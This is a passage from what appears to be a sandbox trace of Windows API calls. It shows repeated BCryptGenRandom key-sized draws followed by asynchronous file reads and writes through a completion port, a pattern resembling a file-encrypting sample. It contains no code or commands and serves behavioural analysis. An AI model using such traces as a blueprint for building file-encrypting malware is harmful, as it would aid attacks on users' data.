pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0177.556] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.557] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.557] free (_Block=0x3e305b8) [0177.557] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.557] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.557] free (_Block=0x1fa91d0) [0177.557] free (_Block=0x1fa2ed8) [0177.557] free (_Block=0x1fa90b8) [0177.557] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0177.566] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0177.566] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.566] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.567] free (_Block=0x3e305b8) [0177.567] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.567] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.567] free (_Block=0x1fa91d0) [0177.567] free (_Block=0x1fa2ed8) [0177.567] free (_Block=0x1fa90b8) [0177.567] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.573] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.573] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0177.573] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.574] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0177.574] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.574] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.574] free (_Block=0x3e305b8) [0177.574] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.574] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.574] free (_Block=0x1fa91d0) [0177.574] free (_Block=0x1fa2ed8) [0177.574] free (_Block=0x1fa90b8) [0177.574] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0177.575] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.585] CloseHandle (hObject=0x2a8) returned 1 [0177.585] free (_Block=0x1ff1e60) [0177.585] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.597] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.598] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0177.598] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.598] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0177.598] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.599] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.599] free (_Block=0x3e305b8) [0177.599] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.599] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.599] free (_Block=0x1fa91d0) [0177.599] free (_Block=0x1fa2ed8) [0177.599] free (_Block=0x1fa90b8) [0177.599] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0177.599] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.609] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.609] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0177.609] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0177.610] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.610] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.610] free (_Block=0x3e305b8) [0177.610] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.610] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.611] free (_Block=0x1fa91d0) [0177.611] free (_Block=0x1fa2ed8) [0177.611] free (_Block=0x1fa90b8) [0177.611] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.611] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.613] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x20a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0177.614] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.620] CloseHandle (hObject=0x2a8) returned 1 [0177.621] free (_Block=0x1ff1e60) [0177.621] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.627] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2764, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0177.653] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.653] CloseHandle (hObject=0x2a4) returned 1 [0177.653] free (_Block=0x3e70008) [0177.653] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.656] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x9b0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.656] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.656] CloseHandle (hObject=0x2a8) returned 1 [0177.656] free (_Block=0x1ff1e60) [0177.656] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0177.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0177.738] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.738] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.738] free (_Block=0x3e305b8) [0177.738] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.738] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.738] free (_Block=0x1fa91d0) [0177.738] free (_Block=0x1fa2ed8) [0177.738] free (_Block=0x1fa90b8) [0177.738] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.740] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.743] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.796] CloseHandle (hObject=0x2a4) returned 1 [0177.796] free (_Block=0x3d70450) [0177.796] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.807] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.807] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0177.808] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.808] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0177.808] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.808] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.808] free (_Block=0x3e305b8) [0177.808] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.808] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.809] free (_Block=0x1fa91d0) [0177.809] free (_Block=0x1fa2ed8) [0177.809] free (_Block=0x1fa90b8) [0177.809] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.809] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.810] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.846] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.872] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.872] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.898] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x338e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.904] CloseHandle (hObject=0x2a4) returned 1 [0177.904] free (_Block=0x3df0008) [0177.904] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.906] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xce8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.906] CloseHandle (hObject=0x338) returned 1 [0177.906] free (_Block=0x1ff1e60) [0177.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.943] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0177.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0178.537] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0178.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0178.781] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1c20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0178.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.310] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1230, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0179.310] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.318] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x738, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.329] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0179.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0179.330] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.330] free (_Block=0x3e305b8) [0179.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.330] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.330] free (_Block=0x1fa91d0) [0179.331] free (_Block=0x1fa2ed8) [0179.331] free (_Block=0x1fa90b8) [0179.331] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0179.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.345] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xc70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0179.345] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0179.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.359] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0179.359] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.359] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.359] free (_Block=0x3e305b8) [0179.359] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.359] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.360] free (_Block=0x1fa91d0) [0179.360] free (_Block=0x1fa2ed8) [0179.360] free (_Block=0x1fa90b8) [0179.360] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.360] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.371] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.371] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0179.371] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.372] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0179.372] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.372] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.372] free (_Block=0x3e305b8) [0179.372] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.372] calloc (_Count=0x82, 